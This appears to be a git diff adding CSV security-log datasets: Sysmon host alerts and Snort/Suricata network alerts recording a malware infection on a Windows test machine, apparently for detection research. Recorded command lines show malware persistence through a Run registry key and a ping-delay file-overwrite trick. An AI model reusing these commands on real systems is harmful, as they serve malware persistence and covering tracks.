09:37:32.291"",""processGuid"":""{df9fc3d3-e198-5ecc-0000-00109c992e00}"",""processId"":""3556"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\explorer.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\wrzaxthjp"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Roaming\\\\Microsoft\\\\Eofgx\\\\ywpeoq.exe\\\""""}}}","\""C:\\Users\\John Williams\\AppData\\Roaming\\Microsoft\\Eofgx\\ywpeoq.exe\""" +"May 28, 2020 @ 09:55:35.893",12,"Sysmon - Suspicious Process - explorer.exe","""Process Create: +RuleName: +UtcTime: 2020-05-26 09:30:00.171 +ProcessGuid: {df9fc3d3-e198-5ecc-0000-00109c992e00} +ProcessId: 3556 +Image: C:\Windows\SysWOW64\explorer.exe +FileVersion: 10.0.18362.693 (WinBuild.160101.0800) +Description: Windows Explorer +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: EXPLORER.EXE +CommandLine: C:\Windows\SysWOW64\explorer.exe +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-dfe2-5ecc-0000-0020502d0300} +LogonId: 0x32D50 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=710CD555C00C29C59152DD50CAA553ED,SHA256=6E6E91554392595D18EE3D691258FC1D23E19DDC1E0BD6C26051DEBB8B70E5FD,IMPHASH=C3681D33DE70933393BD754BC4BCE962 +ParentProcessGuid: {df9fc3d3-e194-5ecc-0000-0010e5692e00} +ParentProcessId: 2040 +ParentImage: C:\Users\John Williams\AppData\Roaming\Microsoft\Eofgx\ywpeoq.exe +ParentCommandLine: ""C:\Users\John Williams\AppData\Roaming\Microsoft\Eofgx\ywpeoq.exe""""","C:\\Windows\\SysWOW64\\explorer.exe",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-26T09:30:00.216640900Z"",""eventRecordID"":""1524"",""processID"":""2176"",""threadID"":""3312"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-26 09:30:00.171\r\nProcessGuid: {df9fc3d3-e198-5ecc-0000-00109c992e00}\r\nProcessId: 3556\r\nImage: C:\\Windows\\SysWOW64\\explorer.exe\r\nFileVersion: 10.0.18362.693 (WinBuild.160101.0800)\r\nDescription: Windows Explorer\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: EXPLORER.EXE\r\nCommandLine: C:\\Windows\\SysWOW64\\explorer.exe\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-dfe2-5ecc-0000-0020502d0300}\r\nLogonId: 0x32D50\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=710CD555C00C29C59152DD50CAA553ED,SHA256=6E6E91554392595D18EE3D691258FC1D23E19DDC1E0BD6C26051DEBB8B70E5FD,IMPHASH=C3681D33DE70933393BD754BC4BCE962\r\nParentProcessGuid: {df9fc3d3-e194-5ecc-0000-0010e5692e00}\r\nParentProcessId: 2040\r\nParentImage: C:\\Users\\John Williams\\AppData\\Roaming\\Microsoft\\Eofgx\\ywpeoq.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\AppData\\Roaming\\Microsoft\\Eofgx\\ywpeoq.exe\""\""""},""eventdata"":{""utcTime"":""2020-05-26 09:30:00.171"",""processGuid"":""{df9fc3d3-e198-5ecc-0000-00109c992e00}"",""processId"":""3556"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\explorer.exe"",""fileVersion"":""10.0.18362.693 (WinBuild.160101.0800)"",""description"":""Windows Explorer"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""EXPLORER.EXE"",""commandLine"":""C:\\\\Windows\\\\SysWOW64\\\\explorer.exe"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-dfe2-5ecc-0000-0020502d0300}"",""logonId"":""0x32d50"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=710CD555C00C29C59152DD50CAA553ED,SHA256=6E6E91554392595D18EE3D691258FC1D23E19DDC1E0BD6C26051DEBB8B70E5FD,IMPHASH=C3681D33DE70933393BD754BC4BCE962"",""parentProcessGuid"":""{df9fc3d3-e194-5ecc-0000-0010e5692e00}"",""parentProcessId"":""2040"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Roaming\\\\Microsoft\\\\Eofgx\\\\ywpeoq.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Roaming\\\\Microsoft\\\\Eofgx\\\\ywpeoq.exe\\\""""}}}", +"May 28, 2020 @ 09:55:32.252",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-26 09:29:56.664 +ProcessGuid: {df9fc3d3-e194-5ecc-0000-001087762e00} +ProcessId: 3572 +Image: C:\Windows\SysWOW64\PING.EXE +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: TCP/IP Ping Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: ping.exe +CommandLine: ping.exe -n 6 127.0.0.1 +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-dfe2-5ecc-0000-0020502d0300} +LogonId: 0x32D50 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=36A1F0BBF757F52C9F051C91D11DE6AA,SHA256=09E7534F7703B4E067455F0D83A77EFA28A04C368381C5A0456282A57E801B04,IMPHASH=6C1FE20B3F9688A9263FFDF9FF417272 +ParentProcessGuid: {df9fc3d3-e194-5ecc-0000-0010d1732e00} +ParentProcessId: 6400 +ParentImage: C:\Windows\SysWOW64\cmd.exe +ParentCommandLine: ""C:\Windows\System32\cmd.exe"" /c ping.exe -n 6 127.0.0.1 & type ""C:\Windows\System32\calc.exe"" > ""C:\Users\JOHNWI~1\AppData\Local\Temp\PicturesViewer.exe""""","ping.exe -n 6 127.0.0.1",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-26T09:29:56.666387700Z"",""eventRecordID"":""1520"",""processID"":""2176"",""threadID"":""3312"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-26 09:29:56.664\r\nProcessGuid: {df9fc3d3-e194-5ecc-0000-001087762e00}\r\nProcessId: 3572\r\nImage: C:\\Windows\\SysWOW64\\PING.EXE\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: TCP/IP Ping Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: ping.exe\r\nCommandLine: ping.exe -n 6 127.0.0.1 \r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-dfe2-5ecc-0000-0020502d0300}\r\nLogonId: 0x32D50\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=36A1F0BBF757F52C9F051C91D11DE6AA,SHA256=09E7534F7703B4E067455F0D83A77EFA28A04C368381C5A0456282A57E801B04,IMPHASH=6C1FE20B3F9688A9263FFDF9FF417272\r\nParentProcessGuid: {df9fc3d3-e194-5ecc-0000-0010d1732e00}\r\nParentProcessId: 6400\r\nParentImage: C:\\Windows\\SysWOW64\\cmd.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\cmd.exe\"" /c ping.exe -n 6 127.0.0.1 & type \""C:\\Windows\\System32\\calc.exe\"" > \""C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\PicturesViewer.exe\""\""""},""eventdata"":{""utcTime"":""2020-05-26 09:29:56.664"",""processGuid"":""{df9fc3d3-e194-5ecc-0000-001087762e00}"",""processId"":""3572"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\PING.EXE"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""TCP/IP Ping Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""ping.exe"",""commandLine"":""ping.exe -n 6 127.0.0.1"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-dfe2-5ecc-0000-0020502d0300}"",""logonId"":""0x32d50"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=36A1F0BBF757F52C9F051C91D11DE6AA,SHA256=09E7534F7703B4E067455F0D83A77EFA28A04C368381C5A0456282A57E801B04,IMPHASH=6C1FE20B3F9688A9263FFDF9FF417272"",""parentProcessGuid"":""{df9fc3d3-e194-5ecc-0000-0010d1732e00}"",""parentProcessId"":""6400"",""parentImage"":""C:\\\\Windows\\\\SysWOW64\\\\cmd.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\cmd.exe\\\"" /c ping.exe -n 6 127.0.0.1 & type \\\""C:\\\\Windows\\\\System32\\\\calc.exe\\\"" > \\\""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\PicturesViewer.exe\\\""""}}}", diff --git a/data/MW_5_NIDS.csv b/data/MW_5_NIDS.csv new file mode 100644 index 0000000..84a2e68 --- /dev/null +++ b/data/MW_5_NIDS.csv @@ -0,0 +1,13 @@ +"@timestamp",message,"log.file.path" +"May 28, 2020 @ 09:57:10.035","05/28/2020-09:57:03.108879 [**] [1:2018959:4] ET POLICY PE EXE or DLL Windows file download HTTP [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 74.125.100.167:80 -> 172.16.2.2:50182","/var/log/suricata/fast.log" +"May 28, 2020 @ 09:57:10.035","05/28/2020-09:57:03.108879 [**] [1:2014520:6] ET INFO EXE - Served Attached HTTP [**] [Classification: Misc activity] [Priority: 3] {TCP} 74.125.100.167:80 -> 172.16.2.2:50182","/var/log/suricata/fast.log" +"May 28, 2020 @ 09:57:00.068","05/28-09:56:58.919140 [**] [1:2014520:2] ET INFO EXE - Served Attached HTTP [**] [Classification: Misc activity] [Priority: 3] {TCP} 74.125.100.167:80 -> 172.16.2.2:50182","/var/log/snort/alert.fast" +"May 28, 2020 @ 09:57:00.068","05/28-09:56:58.919140 [**] [1:2018959:4] ET POLICY PE EXE or DLL Windows file download HTTP [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 74.125.100.167:80 -> 172.16.2.2:50182","/var/log/snort/alert.fast" +"May 28, 2020 @ 09:54:25.010","05/28-09:54:16.334943 [**] [1:2018959:4] ET POLICY PE EXE or DLL Windows file download HTTP [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 5.23.52.122:80 -> 172.16.2.2:50126","/var/log/snort/alert.fast" +"May 28, 2020 @ 09:54:25.010","05/28-09:54:18.723996 [**] [1:2014520:2] ET INFO EXE - Served Attached HTTP [**] [Classification: Misc activity] [Priority: 3] {TCP} 5.23.52.122:80 -> 172.16.2.2:50128","/var/log/snort/alert.fast" +"May 28, 2020 @ 09:54:25.010","05/28-09:54:18.723996 [**] [1:2018959:4] ET POLICY PE EXE or DLL Windows file download HTTP [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 5.23.52.122:80 -> 172.16.2.2:50128","/var/log/snort/alert.fast" +"May 28, 2020 @ 09:54:25.009","05/28/2020-09:54:16.471258 [**] [1:2018959:4] ET POLICY PE EXE or DLL Windows file download HTTP [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 5.23.52.122:80 -> 172.16.2.2:50126","/var/log/suricata/fast.log" +"May 28, 2020 @ 09:54:25.009","05/28/2020-09:54:16.471258 [**] [1:2014520:6] ET INFO EXE - Served Attached HTTP [**] [Classification: Misc activity] [Priority: 3] {TCP} 5.23.52.122:80 -> 172.16.2.2:50126","/var/log/suricata/fast.log" +"May 28, 2020 @ 09:54:25.009","05/28/2020-09:54:18.952366 [**] [1:2018959:4] ET POLICY PE EXE or DLL Windows file download HTTP [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 5.23.52.122:80 -> 172.16.2.2:50128","/var/log/suricata/fast.log" +"May 28, 2020 @ 09:54:25.009","05/28/2020-09:54:18.952366 [**] [1:2014520:6] ET INFO EXE - Served Attached HTTP [**] [Classification: Misc activity] [Priority: 3] {TCP} 5.23.52.122:80 -> 172.16.2.2:50128","/var/log/suricata/fast.log" +"May 28, 2020 @ 09:54:25.009","05/28-09:54:16.334943 [**] [1:2014520:2] ET INFO EXE - Served Attached HTTP [**] [Classification: Misc activity] [Priority: 3] {TCP} 5.23.52.122:80 -> 172.16.2.2:50126","/var/log/snort/alert.fast" diff --git a/data/MW_6_HIDS_3.csv b/data/MW_6_HIDS_3.csv new file mode 100644 index 0000000..542fd43 --- /dev/null +++ b/data/MW_6_HIDS_3.csv @@ -0,0 +1,161 @@ +timestamp,"rule.level","rule.description","data.win.system.message","data.win.eventdata.commandLine","data.win.eventdata.targetObject","full_log","data.win.eventdata.details" +"May 28, 2020 @ 12:17:27.949",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}' checksum changed. +Old md5sum was: '7b0e21ee99623454e8d06871f064ed98' +New md5sum is : '7fa7290c3b0e7b2d8ed5a092299db356' +Old sha1sum was: 'f63735bbc2e72216030f4e994b7c9785856a9170' +New sha1sum is : '27735fff26a4f9093576dfbd77d06599094d3497' +", +"May 28, 2020 @ 12:17:26.854",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: 'ca03a699ef4a8d5fc7dbf35d64e054e0' +New md5sum is : '451281856a95784f3f631c6ed2dfd3d2' +Old sha1sum was: '1b71ef2e669844e9269d00eb70279efaa6016d12' +New sha1sum is : 'ce278144ea52b95bdfabfb8c3a68a61d709530c4' +", +"May 28, 2020 @ 12:17:26.839",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '724cdf662876b7f16830bfbeb2ac9b3a' +New md5sum is : '8e9147c00e3845c0b79118bcdba05339' +Old sha1sum was: 'eb3a1f0df599d4e06740b3159f04bf6b12fbffc7' +New sha1sum is : '27fd277750d88f31b0a0405777373541ddaeabdf' +", +"May 28, 2020 @ 12:17:24.558",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer' checksum changed. +Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e' +New md5sum is : '497a8c7081c737f07c267a30b1538ff9' +Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +New sha1sum is : '58d9cdbd07af978efc5e91b8e7a66696280d3b1e' +", +"May 28, 2020 @ 12:17:20.230",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_WINDOWEDSELECTCONTROL' checksum changed. +Old md5sum was: '370914f65a755a1cbfcf0c873b11feaa' +New md5sum is : '1c729912f87f9abbd1574176fc5996f7' +Old sha1sum was: 'ea4c2f8e1a1dc5de73a98dbadb5abff9297c9a4b' +New sha1sum is : '1d2094dc263dc3db258f4421536e179cfbd9cfb0' +", +"May 28, 2020 @ 12:17:11.241",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility' checksum changed. +Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e' +New md5sum is : '44a185f2e5e0fa09edbcbe3e598fe4da' +Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +New sha1sum is : 'f7a3cf6aa04ebaeee3c4525064299cb2136e4f06' +", +"May 28, 2020 @ 12:17:01.136",10,"ATT&CK T1060: Autorun Keys Modification","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-28 12:16:53.927 +ProcessGuid: {df9fc3d3-aba5-5ecf-0000-00100a6f0b00} +ProcessId: 6556 +Image: C:\Users\John Williams\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\RunOnce\Uninstall 20.052.0311.0011 +Details: C:\Windows\system32\cmd.exe /q /c rmdir /s /q ""C:\Users\John Williams\AppData\Local\Microsoft\OneDrive\20.052.0311.0011""""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Uninstall 20.052.0311.0011","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:16:53.946652100Z"",""eventRecordID"":""2157"",""processID"":""2180"",""threadID"":""3120"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-28 12:16:53.927\r\nProcessGuid: {df9fc3d3-aba5-5ecf-0000-00100a6f0b00}\r\nProcessId: 6556\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Uninstall 20.052.0311.0011\r\nDetails: C:\\Windows\\system32\\cmd.exe /q /c rmdir /s /q \""C:\\Users\\John Williams\\AppData\\Local\\Microsoft\\OneDrive\\20.052.0311.0011\""\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-28 12:16:53.927"",""processGuid"":""{df9fc3d3-aba5-5ecf-0000-00100a6f0b00}"",""processId"":""6556"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\Update\\\\OneDriveSetup.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\Uninstall 20.052.0311.0011"",""details"":""C:\\\\Windows\\\\system32\\\\cmd.exe /q /c rmdir /s /q \\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\20.052.0311.0011\\\""""}}}","C:\\Windows\\system32\\cmd.exe /q /c rmdir /s /q \""C:\\Users\\John Williams\\AppData\\Local\\Microsoft\\OneDrive\\20.052.0311.0011\""" +"May 28, 2020 @ 12:17:01.133",10,"ATT&CK T1060: Autorun Keys Modification","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-28 12:16:53.927 +ProcessGuid: {df9fc3d3-aba5-5ecf-0000-00100a6f0b00} +ProcessId: 6556 +Image: C:\Users\John Williams\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\RunOnce\Uninstall 20.052.0311.0011 +Details: C:\Windows\system32\cmd.exe /q /c rmdir /s /q ""C:\Users\John Williams\AppData\Local\Microsoft\OneDrive\20.052.0311.0011""""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Uninstall 20.052.0311.0011","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:16:53.946388900Z"",""eventRecordID"":""2156"",""processID"":""2180"",""threadID"":""3120"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-28 12:16:53.927\r\nProcessGuid: {df9fc3d3-aba5-5ecf-0000-00100a6f0b00}\r\nProcessId: 6556\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Uninstall 20.052.0311.0011\r\nDetails: C:\\Windows\\system32\\cmd.exe /q /c rmdir /s /q \""C:\\Users\\John Williams\\AppData\\Local\\Microsoft\\OneDrive\\20.052.0311.0011\""\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-28 12:16:53.927"",""processGuid"":""{df9fc3d3-aba5-5ecf-0000-00100a6f0b00}"",""processId"":""6556"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\Update\\\\OneDriveSetup.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\Uninstall 20.052.0311.0011"",""details"":""C:\\\\Windows\\\\system32\\\\cmd.exe /q /c rmdir /s /q \\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\20.052.0311.0011\\\""""}}}","C:\\Windows\\system32\\cmd.exe /q /c rmdir /s /q \""C:\\Users\\John Williams\\AppData\\Local\\Microsoft\\OneDrive\\20.052.0311.0011\""" +"May 28, 2020 @ 12:17:01.082",10,"ATT&CK T1060: Autorun Keys Modification","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-28 12:16:53.911 +ProcessGuid: {df9fc3d3-aba5-5ecf-0000-00100a6f0b00} +ProcessId: 6556 +Image: C:\Users\John Williams\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\RunOnce\Uninstall 20.052.0311.0011\amd64 +Details: C:\Windows\system32\cmd.exe /q /c rmdir /s /q ""C:\Users\John Williams\AppData\Local\Microsoft\OneDrive\20.052.0311.0011\amd64""""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Uninstall 20.052.0311.0011\\amd64","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:16:53.946142400Z"",""eventRecordID"":""2155"",""processID"":""2180"",""threadID"":""3120"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-28 12:16:53.911\r\nProcessGuid: {df9fc3d3-aba5-5ecf-0000-00100a6f0b00}\r\nProcessId: 6556\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Uninstall 20.052.0311.0011\\amd64\r\nDetails: C:\\Windows\\system32\\cmd.exe /q /c rmdir /s /q \""C:\\Users\\John Williams\\AppData\\Local\\Microsoft\\OneDrive\\20.052.0311.0011\\amd64\""\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-28 12:16:53.911"",""processGuid"":""{df9fc3d3-aba5-5ecf-0000-00100a6f0b00}"",""processId"":""6556"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\Update\\\\OneDriveSetup.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\Uninstall 20.052.0311.0011\\\\amd64"",""details"":""C:\\\\Windows\\\\system32\\\\cmd.exe /q /c rmdir /s /q \\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\20.052.0311.0011\\\\amd64\\\""""}}}","C:\\Windows\\system32\\cmd.exe /q /c rmdir /s /q \""C:\\Users\\John Williams\\AppData\\Local\\Microsoft\\OneDrive\\20.052.0311.0011\\amd64\""" +"May 28, 2020 @ 12:16:56.968",10,"ATT&CK T1060: Autorun Keys Modification","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-28 12:16:50.287 +ProcessGuid: {df9fc3d3-aba5-5ecf-0000-00100a6f0b00} +ProcessId: 6556 +Image: C:\Users\John Williams\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\RunOnce\Delete Cached Standalone Update Binary +Details: C:\Windows\system32\cmd.exe /q /c del /q ""C:\Users\John Williams\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe""""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Delete Cached Standalone Update Binary","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:16:50.303252000Z"",""eventRecordID"":""2113"",""processID"":""2180"",""threadID"":""3120"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-28 12:16:50.287\r\nProcessGuid: {df9fc3d3-aba5-5ecf-0000-00100a6f0b00}\r\nProcessId: 6556\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Delete Cached Standalone Update Binary\r\nDetails: C:\\Windows\\system32\\cmd.exe /q /c del /q \""C:\\Users\\John Williams\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdater\\OneDriveSetup.exe\""\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-28 12:16:50.287"",""processGuid"":""{df9fc3d3-aba5-5ecf-0000-00100a6f0b00}"",""processId"":""6556"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\Update\\\\OneDriveSetup.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\Delete Cached Standalone Update Binary"",""details"":""C:\\\\Windows\\\\system32\\\\cmd.exe /q /c del /q \\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\StandaloneUpdater\\\\OneDriveSetup.exe\\\""""}}}","C:\\Windows\\system32\\cmd.exe /q /c del /q \""C:\\Users\\John Williams\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdater\\OneDriveSetup.exe\""" +"May 28, 2020 @ 12:16:56.951",10,"ATT&CK T1060: Autorun Keys Modification","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-28 12:16:50.287 